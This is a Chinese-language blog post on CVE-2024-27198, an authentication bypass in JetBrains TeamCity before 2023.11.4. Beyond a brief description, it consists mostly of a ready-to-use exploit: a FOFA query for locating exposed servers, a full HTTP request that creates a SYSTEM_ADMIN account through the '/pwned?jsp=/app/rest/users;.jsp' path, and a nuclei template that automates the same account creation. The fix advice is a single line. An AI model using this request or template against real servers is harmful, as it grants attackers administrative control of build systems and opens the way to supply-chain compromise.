TeamCity 身份验证绕过漏洞(CVE-2024-27198)

最新推荐文章于 2024-07-06 14:42:08 发布
最新推荐文章于 2024-07-06 14:42:08 发布
阅读量307 收藏
点赞数 2
文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36334672/article/details/136508115
版权

1.漏洞介绍

etBrains TeamCity是一款由JetBrains开发的持续集成和持续交付(CI/CD)服务器。它提供了一个功能强大的平台,用于自动化构建、测试和部署软件项目。TeamCity旨在简化团队协作和软件交付流程,提高开发团队的效率和产品质量。

恶意攻击者利用CVE-2024-27198可以绕过系统身份验证,创建管理员账户,完全控制所有TeamCity项目、构建、代理和构件,为攻击者执行供应链攻击。恶意攻击者利用该漏洞能够绕过身份认证在系统上执行任意代码

2.漏洞编号
CVECNVDCNNVD
CVE-2024-27198--

3.影响范围
名称版本号
TeamCity< 2023.11.4

4.检索特征

FOFA:body=“Log in to TeamCity”
在这里插入图片描述

5.POC
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Connection: close
Content-Length: 130
Accept: */*
Accept-Encoding: gzip, deflate
Content-Type: application/json

{"username": "4qmtd", "password": "test", "email": "test@test.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}

在这里插入图片描述4qmtd/test 登录后台页面
在这里插入图片描述
nuclei检测

id: JetBrains-TeamCity
 
info:
  name: 恶意攻击者利用CVE-2024-27198可以绕过系统身份验证,创建管理员账户,完全控制所有TeamCity项目、构建、代理和构件,为攻击者执行供应链攻击。恶意攻击者利用该漏洞能够绕过身份认证在系统上执行任意代码。
  author: test
  severity: high
  metadata: 
    fofa-query: body="Log in to TeamCity"
variables:
  filename: "{{to_lower(rand_base(5))}}"
  boundary: "{{to_lower(rand_base(20))}}"
http:
  - raw:
      - |
        POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
        Accept: */*
        Content-Type: application/json
        Accept-Encoding: gzip, deflate
        
        {"username": "{{filename}}", "password": "test", "email": "test@test.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}
 
 
 
    matchers:
      - type: dsl
        dsl:
          - status_code==200 && contains_all(body,"standalone=","{{filename}}")

6.修复建议

更新到最新版本

7.参考信息
qq_36334672
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
JetBrains TeamCity RCE漏洞复现(CVE-2023-42793)
0xSec
12-04 1138
JetBrains TeamCity 可通过访问 /app/rest/users/{{id}}/tokens/RPC2 端点获取对应 id 用户的有效 token,携带 admin token 访问受限端点导致远程命令执行或创建后台管理员用户。
Apache Shiro身份验证绕过漏洞(CVE-2020-13933)
07-17
直接使用java -jar srping....war命令运行即可 执行之后,访问http://主机的IP:8888/admin/*或者http://主机的IP:8888/login
JetBrains TeamCity 身份验证绕过漏洞复现(CVE-2024-27199)
m0_50797689的博客
03-06 477
JetBrains TeamCity 身份验证绕过漏洞复现(CVE-2024-27199)
漏洞分析|JetBrains TeamCity 任意用户创建(CVE-2023-42793)
xuandaoren的博客
12-08 569
可以下载官方补丁进行修复:https://blog.jetbrains.com/zh-hans/teamcity/2023/09/critical-security-issue-affecting-teamcity-on-premises-update-to-2023-05-4-now/ ,也可直接升级到2023.05.4版本之后。接下来反编译 /TeamCity-2023.05.2/webapps/ROOT/WEB-INF/plugins/rest-api/server/rest-api.jar,
【JetBrains TeamCity 身份验证绕过漏洞 CVE-2024-27198 未授权创建用户token】 + 上传恶意插件执行命令 反弹shell【复现漏洞】【有漏洞exp】
weixin_43977052的博客
03-07 1225
1、绕过限制,未授权生成token。2、利用创建用户token上传恶意插件以实现任意代码执行。
Goby 漏洞发布|JetBrains TeamCity 权限绕过漏洞CVE-2024-27198 & CVE-2024-27199)
m0_46699477的博客
03-21 248
JetBrains TeamCity是一款由JetBrains开发的持续集成和持续交付(CI/CD)服务器。它提供了一个功能强大的平台,用于自动化构建、测试和部署软件项目。TeamCity旨在简化团队协作和软件交付流程,提高开发团队的效率和产品质量。JetBrains TeamCity 在 2023.11.4 版本之前存在认证绕过漏洞。攻击者可以利用该漏洞绕过认证机制,直接执行管理员操作,并结合后台功能,攻击者可通过该漏洞在服务器端任意执行系统命令,写入后门,获取服务器权限,进而控制整个web服务器。
TeamCity使用过程中遇到的问题记录
viz
09-22 3225
在/etc/init.d/中添加脚本来实现开机启动后,无法获取到JAVA_HOME/GRADLE_HOME/ANDROID_HOME等环境变量,需要在脚本中添加 配置Additional Gradle command line parameters字段是需要加上-g /home/users/.gradle(这里/home/users不能用‘~’代替),这样在编译的时候就可以使用缓存,加上–daemo
使用 Burp Infiltrator 进行漏洞挖掘
weixin_33827731的博客
09-14 666
本文讲的是使用 Burp Infiltrator 进行漏洞挖掘,在本文中,我将演示如何使用Burp Infiltrator来找到JetBrains公司产品TeamCity的通用型0day,TeamCity是Java编写的一款针对专业开发人员和构建工程师的持续集成(CI)服务器。在这一过程中Burp Infiltrator通过测试目标应用程序,注入代码来跟...
exploit (Linux 内核CVE-2024-1086漏洞复现脚本)
06-06
Linux 内核CVE-2024-1086漏洞复现脚本。 在普通用户下,将文件上传后,chmod 777 exploit ,然后运行 ./exploit ,提权成功,输入id,可看到已经是root权限 。
Tiki Wiki CMS Groupware 认证绕过漏洞CVE-2020-15906POC
09-04
Tiki Wiki CMS Groupware 认证绕过漏洞CVE-2020-15906POC Tiki Wiki CMS Groupware或简称为Tiki(最初称为TikiWiki)是一种免费且开源的基于Wiki的内容管理系统和在线办公套件。在如下这些版本21.2, 20.4, 19.3, ...
IIS "IP and domain restrictions" 绕过漏洞(CVE-2014-4078)
02-09
【该漏洞通过版本比较方式检测,结果可能不准确,需要根据实际情况确认。】Microsoft Internet信息服务(IIS)是Microsoft Windows自带的一个网络信息服务器,其中包含HTTP服务功能。 "IP and domain restrictions" ...
Akamai+Noname强强联合 | API安全再加强
AKAMAI_CHINA的博客
07-03 1043
最近,Akamai正式完成了对Noname Security的收购。本文我们将向大家介绍,经过本次收购后,Akamai在保护API安全性方面的后续计划和未来愿景。Noname Security是市场上领先的API安全供应商之一,此次收购将让Akamai能更好地满足日益增长的客户需求和市场要求。具体来说,Akamai将能借助本次收购扩展API流量方面的情报,满足客户可能提出的,与业务、集成或部署要求有关的任何问题。
安全隔离上网的有效途径:沙箱
Canon_YK的博客
07-01 547
沙箱技术,顾名思义,就像是在计算机系统中构建一个“沙箱”,将应用程序或系统进程的运行限制在这个“沙箱”内,使其无法访问或修改系统核心资源,从而达到隔离的效果。沙箱技术作为一种高效的隔离机制,为企业和个人提供了一种在享受网络便利的同时,保障系统安全的解决方案。浏览器级别沙箱是另一种常见的沙箱技术实现方式。目前也只有深信达的沙箱技术是可以运行和控制虚拟机的,将整个磁盘进行加密可以很好地进行控制,如果企业安全需求比较高可以采用全盘加密的方式,一般情况下隔离出虚拟空间的轻型沙箱就可以满足轻量化办公的需求。
FMEA在大型光伏电站安全生产管理中的应用
tianxingjian713的博客
07-03 409
它通过对产品或过程中可能出现的故障模式进行系统性地梳理和分析,评估其可能的影响程度和发生概率,从而制定相应的预防措施和应对措施,以降低故障发生的可能性和影响程度。FMEA在光伏电站安全生产管理中的应用,主要是通过对电站系统、设备和工艺过程进行全面的故障分析,找出潜在的故障模式和影响,进而制定针对性的预防措施,提高电站的安全性和可靠性。然后,针对每个子系统和设备,分析其可能出现的故障模式及其影响,包括故障对电站运行的影响、对人员安全的影响以及对环境的影响等。在评估故障影响的基础上,需要制定相应的预防措施。
WebKit中的安全新纪元:Web Authentication API深度解析
2401_85763639的博客
07-03 669
Web Authentication API是一种新兴的Web标准,旨在使用公钥密码学提供更安全的登录和多因素认证方法。与传统的用户名和密码认证方式相比,WebAuthn提供了一种无密码的认证机制,从而减少了密码泄露和钓鱼攻击的风险。
[图解]SysML和EA建模住宅安全系统-08-安全企业用例图
rolt的专栏
07-03 668
因为主辅只是针对某个用例而言
[图解]SysML和EA建模住宅安全系统-11-接口块
最新发布
rolt的专栏
07-06 490
当然内部块图里面肯定要比这个丰富
NTP 身份验证绕过漏洞(CVE-2015-7871)
05-09
CVE-2015-7871是NTP中的一个身份验证绕过漏洞,攻击者可以利用该漏洞来实现远程攻击并控制目标机器。 该漏洞的原因是NTP在处理某些特殊的数据包时会发生缓冲区溢出,导致攻击者可以通过发送精心构造的数据包来触发...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值